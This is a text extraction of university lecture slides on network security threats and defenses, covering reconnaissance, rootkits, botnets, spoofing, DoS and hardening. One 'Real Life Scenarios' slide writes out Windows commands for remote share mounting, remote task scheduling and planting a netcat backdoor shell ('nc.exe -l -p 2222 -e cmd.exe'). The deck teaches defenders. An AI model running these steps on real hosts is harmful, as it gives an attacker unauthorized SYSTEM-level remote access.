INLS 578 Network Security March 26, 2008

slurpslapoutNetworking and Communications

Nov 20, 2013 (3 years and 10 months ago)

92 views

Network Security

April 1, 2009

Disclaimer/AUP Review


Kevin Lanning, MSIS GSEC CISSP

Information Security Office

UNC
-
Chapel Hill

Sources:

Sans.org, courses 401,504 and 508 Isc2.org CBK



Information Security Triad


Policy

Information Security Triad

Networking

Availability
-
the network as a key asset. VOIP
and wireless


Integrity
-
transmitted data must not contain
errors


Confidentiality
-
protection of sensitive
information in transit


The Network




Gary Larsen,

The Complete Far Side

Threats


Use of the network to carry out attacks


Reconnaisance


White, grey and black box


Google hacking
-
open positions, contact lists, key staff,
employee websites, design docs
-
examples


DNS interrogation, zone transfer
-
dig or nslookup


Whois


Scanning/OS finger printing


Active
-
Nessus, nmap, Cheops network mapper with gui
using TTL field of IP header


passive


Password cracking
-
brute force, dictionary,
LANMAN


Intrusion and covering the tracks
-
patching, log
edits, laying low, listening



Threats


Use of the network to carry out attacks

(cont’d)


Maintaining control
-
Netcat, cron, backdoors


Reverse WWW shell
-
uses port 80 out for external
connection. Shell runs on host with input from
external system. Called shoveling a UI. FW scope


Malware distribution


Remote control
-
Radmin, Dameware, Sub7, SSH


Worms
-
morphing to functional equivalents but with
diff code base=signature countermeasures


Botnets


via worms, attachments, bundled with software,
browser exploits
-
solves scaling problem


IRC controls most common


Threats


Sniffing and snooping


Hubs vs. switches



Fiber


Wireless
-
WEP, WPA, 802.11i/WPA2
-
SSL VPNs?

Ghost in the AP


Credential replay
-
tcpreplay


Cable
-
segment sniffing
-
nic in promisc


Attack against the network itself


Denial of service


Attacks against protocols
-
half open tcp
connections, BGP youtube down due to specific
route published by Pakistan
-
Arbor Networks


Own the network with credentials


Threats & Risks


Attacks using encryption
-
mask malicious code


Zero day exploits
-
solution unknown to vendor and
public.


Vulnerable code
-
buffer overflows = not checking
buffer sizes before moving things around in memory;
goal = overwrite the instruction pointer and thus
overwrite with what you want to execute


Remote access
-
PDAs, laptops, unencrypted


Covert channels
-
Stego,IPID field data transfer

http://firstmonday.org/htbin/cgiwrap/bin/ojs/index.php/fm/article/view/528/449



Threats & Risks

End Users


Messaging/browsing



Social engineering/Phishing



Weak protocols
-
telnet, rsh, x11, ftp




Threats & Risks


IP address spoofing
-
hping


Arp cache poisoning
-
gratuitous arp


Session hijacking
-
sniffing and spoofing
-
man
-
n
-
middle
-
ettercap


Source routing
-
source specifies each
router


DNS cache poisoning


Replay attacks
-
netcat, tcpreplay


Threats & Risks


Bots
-
application level Trojan Horses and backdoors
which SCALE.


Backdoors
-
bypass normal security controls. Netcat
listener, tini (3 KB) push it in a buffer overflow?


Ethernet card
-
firmware malware. Wireless?


BIOS or CPU microcode level root kits?
http://www.packetstormsecurity.nl/0407
-
exploits/OpteronMicrocode.txt


Rootkits
-
thousands of them


User mode
-
critical OS components replaced.
Hacker defender


Kernel mode
-
Truly evil. Kernel altered.

Threats & Risks

Rootkits
-
LRK


One example of a rootkit for Unix=LRK


LRK
-
/bin/login is altered to allow attacker root access.



Normal accting is bypassed (who) & chg of root has no impact on backdoor.


Encrypted remote via sshd.


Ethernet in promiscuous mode. Trojan version of ifconfig hides PROMISC flag


Several programs are replaced with new versions so that any non
-
root user who
runs one of the replaced apps with a command that includes the backdoor
password in an argument is immediately elevated to root.


A replacement for ps hides the attackers processes


A replacement for killall provides that the attackers processes cannot be killed


Crontab is modified so that scheduled attacker processes do not show in cron
config files.


Netstat is altered to never show ports being used by the intruder.


Ls and find are altered to never show attackers files.


Du is altered to avoid showing the disk usage of the attacker’s files.


Syslogd is modified to hide events associated with the intrusion.


Fix tool returns “last modified” dates to originals, including the CRC checksum of programs

Trends


Anti
-
malware tools only catching a minority


Repackaging


Encoding


Morphing malware
-
same function but with different
code base


Firewalling of malware


Multi
-
exploit & multi
-
platform worms
-
(Nimda had
12=buffer overflows, browser exploits, etc.)



Trends


More application layer attacks
-
web(WGET
-
NIX and dows; CURL
-
PERL tool for
constructing web requests and automated
harvesting)


PHP #1 application attack at UNC
-
CH


SQL injection attacks via web


Click, drag and drop hacker tools
-
Metasploit
3.0, scale the growth


Hacking for profit, organized crime involved


Lower diversity results in faster spread


Intrusion Prevention Stats

0
1,000,000
2,000,000
3,000,000
4,000,000
5,000,000
6,000,000
Jan
Feb
Mar
Apr
May
Jun
Jul
Aug
Sep
Oct
Nov
Dec
Attacks

Attacks per Month for 2008

IPS-Total Attacks
IPS-Blocked Attacks
Defenses/Countermeasures


Know your environment
-
bus, gov, edu


Know where the valuable stuff exists


Network Design for Defense in Depth


Routing
-
choice of protocols, source routing


Split DNS


Out of band network for availability


Firewalls


Packet filtering


Stateful


Proxy


DMZ
-
web, db


RFC 1918
-
non
-
routable addresses

Defenses/Countermeasures


Secure protocols
-
use for good OR evil


IPSEC


SSL


SSH


Passwords=security 101


Intrusion Protection


Network intrusion Detection Sensors
-
tiny
fragment=reassembly buffers=cd /etc/sha, fragment overlap


HD Moore “Thermoptic Camoflage” = OS dependent


Anti
-
virus, spyware, malware
-
http://secunia.com/gfx/Secunia_Exploit
-
vs
-
AV_test
-
Oct
-
2008.pdf


HIDS, HIPS, “End Point” protection


Defenses/Countermeasures


Secure Administration


Harden public facing systems such as DNS, split brain
DNS, zone transfers only for specified systems


Don’t allow insecure protocols or scope them
-
telnet, ftp


Force password changes often


Auth/Auth


Group policy


Bastion Hosts
-
systems hardened to withstand attack


Build a DMZ
-
web/db


Separate logging server


Defenses/Countermeasures


Host Hardening


File integrity checkers
-
tripwire


Defense in Depth


Only enable needed services
-
reduce attack surface


Check for listening ports open files
-
netstat

na and lsof
-
i


What has ports open
-
tcpview


Profile system at build


Patch, patch, patch


Offline or firewalled build


Special purpose systems
-
lower privs
-
VMs, Deep Freeze


Reduced privs


Log management
-
write once media for logging


Vulnerability management
-
demo


Defenses/Countermeasures


Use secure packages and versions


Apache mod_security



Exec Shield
--

http://en.wikipedia.org/wiki/Exec_Shield


SE Linux
--

http://en.wikipedia.org/wiki/SE_Linux


Windows hardening and get rid of NT 4/2000


Solaris 10


NSA hardening guides

http://www.nsa.gov/snac/downloads_redhat.cfm?MenuID=scg10.3.1.1


Defenses/Countermeasures


Encryption


Symmetric key
-
single key for encryption & decryption


Fast


Secure distribution of key an issue


PKI
-
Public Key Infrastructure


computer users auth to each other without prior contact.
A message encrypted with the recipient’s public key can
only be decrypted with the corresponding private key


Digital signature
-
message signed with private key can be
verified by anyone with the public key


Certificate authority or web of trust model


Key exchange is secure


slow


Hash functions or digests
-
input of any length with a fixed
length output = integrity check


http://upload.wikimedia.org/wikipedia/commons/6/6b/Hash_f
unction_long.svg


Defenses/Countermeasures


Insiders



Logging and auditing



Access controls


Least privilege


Separation of duties
-
escalation



Administrative controls


Mandatory vacation


Job rotation


Real Life Scenarios

!Careful with the following:


Distributed Denial of Service


Imagine an organization with the same local
acct across all critical systems


Web
-
based banking applications


Port 80 authentication


IPS with false crc but doesn’t reset


Take out the competition



Real Life Scenarios


Distributed Denial of Service



Scenario:


Gambling site


Threat of DDOS



Stratagies to counter?

Real Life Scenarios

Extracted from SANS.org 504 with Ed Skoudis

Same local acct across all Windows
systems


Mount target C$ share and assign next
available drive letter:



C:/>net use *
\
\
[target_IP]
\
C$ [admin pwd] /u:
[admin user name]


Start Task Scheduler


C:/>sc
\
\
[target_IP
] start schedule


Check local time on target


C:/>net time
\
\
[target_IP]

Real Life Scenarios

Same local acct across all Windows
systems


Create a batch file with the command to run


C:
\
> notepad backdoor.bat


C:
\
>
\
test
\
netcat
\
nc.exe
-
l
-
p 2222
-
e cmd.exe



Move Netcat and backdoor.bat to the target


Schedule the .bat to run


Use Netcat to connect


C:
\
> nc target_IP 2222


Now have full, command
-
line access with SYSTEM
privileges


Now scale it!


Real Life Scenarios



Imagine bankapp_inlsdemo.com


Must be accessible from everywhere


Have no control over hosts


How


Different errors for valid vs. not valid ID


Low, slow brute force


Google hacking


From where? Use the botnet


Scope out account lockouts
-
pattern?


Real Life Scenarios


Port 80 authentication to a web site
without firewall scoping


Remote connection from wireless or
cable


Interception of traffic


Google hacking


Same password for other Apps


Intruder breaks in to other App

Real Life Scenarios



Remove the competition


Smurf
-
spoof the source (use the victim’s
source) of a ping to a network’s broadcast
address. Spoofed system gets flooded with
replies taking it out of the mix.


SYN floods
-
half open connections
consume resources. Difficult to counter if
highly distributed. Increase connection
queue and timeout half opens. Shorten
timeouts?


Real Life Scenarios



Imagine you are a developer at a start
-
up IPS
company. Everybody needs your services
and your company could go $public$


Real time action is the benefit


Must be fast


Hacker exploit?


Reset with bad check sum?


Recalcs???


Real Life Scenarios



Storm worm is a good example of many
things


Check it out


http://en.wikipedia.org/wiki/Storm_Worm


Take Aways



Hacker community is very well organized. We must
organize too!


Guard network credentials


Hardening guides (see nsa.gov, sans.org,
redhat.com, etc)


Vendor recommendations but defense in depth
against the zero day exploit


Tools, tools, tools


Host
-
based IDS/IPS


End user education
-
they have the power


Exciting time to be in security


Host
-
based firewall
-
scope

Take Away and References



Every day brings news and no one is immune. We must
collaborate


References


www.honeynet.org


Sans.org (see top 20 and isc.sans.org)


Megasecurity.org (see radmin tools list)


http://www.uscert.gov/


Vulnerabilities

http://www.milw0rm.com/

http://secunia.com/


Microsoft

blogs.technet.com/msrc/


CISecurity


http://www.cisecurity.org/benchmarks.html